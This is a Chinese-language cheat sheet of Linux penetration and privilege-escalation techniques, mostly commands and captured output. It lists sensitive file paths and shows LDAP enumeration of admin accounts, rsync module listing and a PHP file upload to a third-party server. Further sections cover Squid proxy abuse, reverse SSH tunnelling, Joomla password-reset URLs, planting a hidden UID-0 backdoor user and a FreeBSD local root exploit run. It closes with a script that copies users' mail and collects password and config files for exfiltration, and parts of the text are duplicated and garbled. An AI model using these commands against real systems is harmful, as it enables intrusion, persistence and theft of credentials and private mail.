LINUX渗透与提权总结

本文为Linux渗透与提权技巧总结篇，旨在收集各种Linux渗透技巧与提权版本，方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径：

001	/etc/passwd

002

003	/etc/shadow

004

005	/etc/fstab

006

007	/etc/host.conf

008

009

/etc/motd

010

011	/etc/ld.so.conf

012

013	/var/www/htdocs/index.php

014

015	/var/www/conf/httpd.conf

016

017	/var/www/htdocs/index.html

018

019	/var/httpd/conf/php.ini

020

021	/var/httpd/htdocs/index.php

022

023	/var/httpd/conf/httpd.conf

024

025	/var/httpd/htdocs/index.html

026

027	/var/httpd/conf/php.ini

028

029	/var/www/index.html

030

031	/var/www/index.php

032

033	/opt/www/conf/httpd.conf

034

035	/opt/www/htdocs/index.php

036

037	/opt/www/htdocs/index.html

038

039	/usr/local/apache/htdocs/index.html

040

041	/usr/local/apache/htdocs/index.php

042

043	/usr/local/apache2/htdocs/index.html

044

045	/usr/local/apache2/htdocs/index.php

046

047	/usr/local/httpd2.2/htdocs/index.php

048

049	/usr/local/httpd2.2/htdocs/index.html

050

051	/tmp/apache/htdocs/index.html

052

053	/tmp/apache/htdocs/index.php

054

055	/etc/httpd/htdocs/index.php

056

057	/etc/httpd/conf/httpd.conf

058

059	/etc/httpd/htdocs/index.html

060

061	/www/php/php.ini

062

063	/www/php4/php.ini

064

065	/www/php5/php.ini

066

067	/www/conf/httpd.conf

068

069	/www/htdocs/index.php

070

071	/www/htdocs/index.html

072

073	/usr/local/httpd/conf/httpd.conf

074

075	/apache/apache/conf/httpd.conf

076

077	/apache/apache2/conf/httpd.conf

078

079	/etc/apache/apache.conf

080

081	/etc/apache2/apache.conf

082

083	/etc/apache/httpd.conf

084

085	/etc/apache2/httpd.conf

086

087	/etc/apache2/vhosts.d/00_default_vhost.conf

088

089	/etc/apache2/sites-available/default

090

091	/etc/phpmyadmin/config.inc.php

092

093	/etc/mysql/my.cnf

094

095	/etc/httpd/conf.d/php.conf

096

097	/etc/httpd/conf.d/httpd.conf

098

099	/etc/httpd/logs/error_log

100

101	/etc/httpd/logs/error.log

102

103	/etc/httpd/logs/access_log

104

105	/etc/httpd/logs/access.log

106

107	/home/apache/conf/httpd.conf

108

109	/home/apache2/conf/httpd.conf

110

111	/var/log/apache/error_log

112

113	/var/log/apache/error.log

114

115	/var/log/apache/access_log

116

117	/var/log/apache/access.log

118

119	/var/log/apache2/error_log

120

121	/var/log/apache2/error.log

122

123	/var/log/apache2/access_log

124

125	/var/log/apache2/access.log

126

127	/var/www/logs/error_log

128

129	/var/www/logs/error.log

130

131	/var/www/logs/access_log

132

133	/var/www/logs/access.log

134

135	/usr/local/apache/logs/error_log

136

137	/usr/local/apache/logs/error.log

138

139	/usr/local/apache/logs/access_log

140

141	/usr/local/apache/logs/access.log

142

143	/var/log/error_log

144

145	/var/log/error.log

146

147	/var/log/access_log

148

149	/var/log/access.log

150

151	/usr/local/apache/logs/access_logaccess_log.old

152

153	/usr/local/apache/logs/error_logerror_log.old

154

155	/etc/php.ini

156

157	/bin/php.ini

158

159	/etc/init.d/httpd

160

161	/etc/init.d/mysql

162

163	/etc/httpd/php.ini

164

165	/usr/lib/php.ini

166

167	/usr/lib/php/php.ini

168

169	/usr/local/etc/php.ini

170

171	/usr/local/lib/php.ini

172

173	/usr/local/php/lib/php.ini

174

175	/usr/local/php4/lib/php.ini

176

177	/usr/local/php4/php.ini

178

179	/usr/local/php4/lib/php.ini

180

181	/usr/local/php5/lib/php.ini

182

183	/usr/local/php5/etc/php.ini

184

185	/usr/local/php5/php5.ini

186

187	/usr/local/apache/conf/php.ini

188

189	/usr/local/apache/conf/httpd.conf

190

191	/usr/local/apache2/conf/httpd.conf

192

193	/usr/local/apache2/conf/php.ini

194

195	/etc/php4.4/fcgi/php.ini

196

197	/etc/php4/apache/php.ini

198

199	/etc/php4/apache2/php.ini

200

201	/etc/php5/apache/php.ini

202

203	/etc/php5/apache2/php.ini

204

205	/etc/php/php.ini

206

207	/etc/php/php4/php.ini

208

209	/etc/php/apache/php.ini

210

211	/etc/php/apache2/php.ini

212

213	/web/conf/php.ini

214

215	/usr/local/Zend/etc/php.ini

216

217	/opt/xampp/etc/php.ini

218

219	/var/local/www/conf/php.ini

220

221	/var/local/www/conf/httpd.conf

222

223	/etc/php/cgi/php.ini

224

225	/etc/php4/cgi/php.ini

226

227	/etc/php5/cgi/php.ini

228

229	/php5/php.ini

230

231	/php4/php.ini

232

233	/php/php.ini

234

235	/PHP/php.ini

236

237	/apache/php/php.ini

238

239	/xampp/apache/bin/php.ini

240

241	/xampp/apache/conf/httpd.conf

242

243	/NetServer/bin/stable/apache/php.ini

244

245	/home2/bin/stable/apache/php.ini

246

247	/home/bin/stable/apache/php.ini

248

249	/var/log/mysql/mysql-bin.log

250

251	/var/log/mysql.log

252

253	/var/log/mysqlderror.log

254

255	/var/log/mysql/mysql.log

256

257	/var/log/mysql/mysql-slow.log

258

259	/var/mysql.log

260

261	/var/lib/mysql/my.cnf

262

263	/usr/local/mysql/my.cnf

264

265	/usr/local/mysql/bin/mysql

266

267	/etc/mysql/my.cnf

268

269	/etc/my.cnf

270

271	/usr/local/cpanel/logs

272

273	/usr/local/cpanel/logs/stats_log

274

275	/usr/local/cpanel/logs/access_log

276

277	/usr/local/cpanel/logs/error_log

278

279	/usr/local/cpanel/logs/license_log

280

281	/usr/local/cpanel/logs/login_log

282

283	/usr/local/cpanel/logs/stats_log

284

285	/usr/local/share/examples/php4/php.ini

286

287	/usr/local/share/examples/php/php.ini

288

289	/usr/local/tomcat5527/bin/version.sh

290

291	/usr/share/tomcat6/bin/startup.sh

292

293	/usr/tomcat6/bin/startup.sh

 liunx 相关提权渗透技巧总结，一、ldap 渗透技巧：

1	1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

1	2.less /etc/ldap.conf

2

3	base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1	ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1	ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1	ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1	1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

1	2.less /etc/ldap.conf

2

3	base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

1	ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式

1	ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录

1	ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

01	ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"

02

03	version: 1

04

05	dn: dc=ruc,dc=edu,dc=cn

06

07

dc: ruc

08

09	objectClass: domain

10

11	dn: uid=manager,dc=ruc,dc=edu,dc=cn

12

13	uid: manager

14

15	objectClass: inetOrgPerson

16

17	objectClass: organizationalPerson

18

19	objectClass: person

20

21	objectClass: top

22

23	sn: manager

24

25	cn: manager

26

27	dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

28

29	uid: superadmin

30

31	objectClass: inetOrgPerson

32

33	objectClass: organizationalPerson

34

35	objectClass: person

36

37	objectClass: top

38

39	sn: superadmin

40

41	cn: superadmin

42

43	dn: uid=admin,dc=ruc,dc=edu,dc=cn

44

45	uid: admin

46

47	objectClass: inetOrgPerson

48

49	objectClass: organizationalPerson

50

51	objectClass: person

52

53	objectClass: top

54

55

sn: admin

56

57

cn: admin

58

59	dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

60

61	uid: dcp_anonymous

62

63	objectClass: top

64

65	objectClass: person

66

67	objectClass: organizationalPerson

68

69	objectClass: inetOrgPerson

70

71	sn: dcp_anonymous

72

73	cn: dcp_anonymous

2.查看基类

1	bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

001	bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"

002

003	version: 1

004

005

dn:

006

007	objectClass: top

008

009	namingContexts: dc=ruc,dc=edu,dc=cn

010

011	supportedExtension: 2.16.840.1.113730.3.5.7

012

013	supportedExtension: 2.16.840.1.113730.3.5.8

014

015	supportedExtension: 1.3.6.1.4.1.4203.1.11.1

016

017	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

018

019	supportedExtension: 2.16.840.1.113730.3.5.3

020

021	supportedExtension: 2.16.840.1.113730.3.5.5

022

023	supportedExtension: 2.16.840.1.113730.3.5.6

024

025	supportedExtension: 2.16.840.1.113730.3.5.4

026

027	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

028

029	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

030

031	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

032

033	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

034

035	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

036

037	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

038

039	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

040

041	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

042

043	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

044

045	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

046

047	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

048

049	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

050

051	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

052

053	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

054

055	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

056

057	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

058

059	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

060

061	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

062

063	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

064

065	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

066

067	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

068

069	supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

070

071	supportedExtension: 1.3.6.1.4.1.1466.20037

072

073	supportedExtension: 1.3.6.1.4.1.4203.1.11.3

074

075	supportedControl: 2.16.840.1.113730.3.4.2

076

077	supportedControl: 2.16.840.1.113730.3.4.3

078

079	supportedControl: 2.16.840.1.113730.3.4.4

080

081	supportedControl: 2.16.840.1.113730.3.4.5

082

083	supportedControl: 1.2.840.113556.1.4.473

084

085	supportedControl: 2.16.840.1.113730.3.4.9

086

087	supportedControl: 2.16.840.1.113730.3.4.16

088

089	supportedControl: 2.16.840.1.113730.3.4.15

090

091	supportedControl: 2.16.840.1.113730.3.4.17

092

093	supportedControl: 2.16.840.1.113730.3.4.19

094

095	supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

096

097	supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

098

099	supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

100

101	supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

102

103	supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

104

105	supportedControl: 2.16.840.1.113730.3.4.14

106

107	supportedControl: 1.3.6.1.4.1.1466.29539.12

108

109	supportedControl: 2.16.840.1.113730.3.4.12

110

111	supportedControl: 2.16.840.1.113730.3.4.18

112

113	supportedControl: 2.16.840.1.113730.3.4.13

114

115	supportedSASLMechanisms: EXTERNAL

116

117	supportedSASLMechanisms: DIGEST-MD5

118

119	supportedLDAPVersion: 2

120

121	supportedLDAPVersion: 3

122

123	vendorName: Sun Microsystems, Inc.

124

125	vendorVersion: Sun-Java(tm)-System-Directory/6.2

126

127	dataversion: 020090516011411

128

129	netscapemdsuffix: cn=ldap://dc=webA:389

130

131	supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

132

133	supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

134

135	supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

136

137	supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

138

139	supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

140

141	supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

142

143	supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

144

145	supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

146

147	supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

148

149	supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

150

151	supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

152

153	supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

154

155	supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

156

157	supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

158

159	supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

160

161	supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

162

163	supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

164

165	supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

166

167	supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

168

169	supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

170

171	supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

172

173	supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

174

175	supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

176

177	supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

178

179	supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

180

181	supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

182

183	supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

184

185	supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

186

187	supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

188

189	supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

190

191	supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

192

193	supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

194

195	supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

196

197	supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

198

199	supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

200

201	supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

202

203	supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

204

205	supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

206

207	supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

208

209	supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

210

211	supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

212

213	supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

214

215	supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

216

217	supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

218

219	supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

220

221	supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

222

223	supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

224

225	supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

226

227	supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

 liunx 相关提权渗透技巧总结，二、NFS 渗透技巧：

列举IP：

1	showmount -e ip

 liunx 相关提权渗透技巧总结，三、rsync渗透技巧：

1.查看rsync服务器上的列表：

01	rsync 210.51.X.X::

02

03

finance

04

05	img_finance

06

07

auto

08

09

img_auto

10

11

html_cms

12

13

img_cms

14

15

ent_cms

16

17

ent_img

18

19

ceshi

20

21

res_img

22

23	res_img_c2

24

25

chip

26

27

chip_c2

28

29

ent_icms

30

31

games

32

33

gamesimg

34

35

media

36

37

mediaimg

38

39

fashion

40

41	res-fashion

42

43

res-fo

44

45	taobao-home

46

47	res-taobao-home

48

49

house

50

51

res-house

52

53

res-home

54

55

res-edu

56

57

res-ent

58

59

res-labs

60

61

res-news

62

63

res-phtv

64

65

res-media

66

67

home

68

69

edu

70

71

news

72

73

res-book

看相应的下级目录(注意一定要在目录后面添加上/)

1	rsync 210.51.X.X::htdocs_app/

2

3	rsync 210.51.X.X::auto/

4

5	rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件

1	rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

1	rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

2

3	http://app.finance.xxx.com/warn/nothack.txt

 liunx 相关提权渗透技巧总结，四、squid渗透技巧：

1	nc -vv 91ri.org 80

2

3	GET HTTP://www.sina.com / HTTP/1.0

4

5	GET HTTP://WWW.sina.com:22 / HTTP/1.0

 liunx 相关提权渗透技巧总结，五、SSH端口转发：

1	ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

 liunx 相关提权渗透技巧总结，六、joomla渗透小技巧：

确定版本：

1	index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码：

1	index.php?option=com_user&view=reset&layout=confirm

 liunx 相关提权渗透技巧总结，七、Linux添加UID为0的root用户：

1	useradd -o -u 0 nothack

 liunx 相关提权渗透技巧总结，八、freebsd本地提权：

01	[argp@julius ~]$ uname -rsi

02

03	* freebsd 7.3-RELEASE GENERIC

04

05	* [argp@julius ~]$ sysctl vfs.usermount

06

07	* vfs.usermount: 1

08

09	* [argp@julius ~]$ id

10

11	* uid=1001(argp) gid=1001(argp) groups=1001(argp)

12

13	* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

14

15	* [argp@julius ~]$ ./nfs_mount_ex

16

17

*

18

19	calling nmount()

 tar 文件夹打包：

1、tar打包：

1	tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*

2

3	alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

{

注：

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

那么用这条比较好

1	tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

}

系统信息收集：

view source

01	for linux：

02

03	#!/bin/bash

04

05	echo #######geting sysinfo####

06

07	echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt

08

09	echo #######basic infomation##

10

11	cat /proc/meminfo

12

13

echo

14

15	cat /proc/cpuinfo

16

17

echo

18

19	rpm -qa 2>/dev/null

20

21	######stole the mail......######

22

23	cp -a /var/mail /tmp/getmail 2>/dev/null

24

25	echo 'u'r id is' `id`

26

27	echo ###atq&crontab#####

28

29

atq

30

31	crontab -l

32

33	echo #####about var#####

34

35

set

36

37	echo #####about network###

38

39	####this is then point in pentest,but i am a new bird,so u need to add some in it

40

41	cat /etc/hosts

42

43

hostname

44

45	ipconfig -a

46

47

arp -v

48

49	echo ########user####

50

51	cat /etc/passwd|grep -i sh

52

53	echo ######service####

54

55	chkconfig --list

56

57	for i in {oracle,mysql,tomcat,samba,apache,ftp}

58

59	cat /etc/passwd|grep -i $i

60

61

done

62

63	locate passwd >/tmp/password 2>/dev/null

64

65

sleep 5

66

67	locate password >>/tmp/password 2>/dev/null

68

69

sleep 5

70

71	locate conf >/tmp/sysconfig 2>dev/null

72

73

sleep 5

74

75	locate config >>/tmp/sysconfig 2>/dev/null

76

77

sleep 5

78

79	###maybe can use "tree /"###

80

81	echo ##packing up#########

82

83	tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig

84

85	rm -rf /tmp/getmail /tmp/password /tmp/sysconfig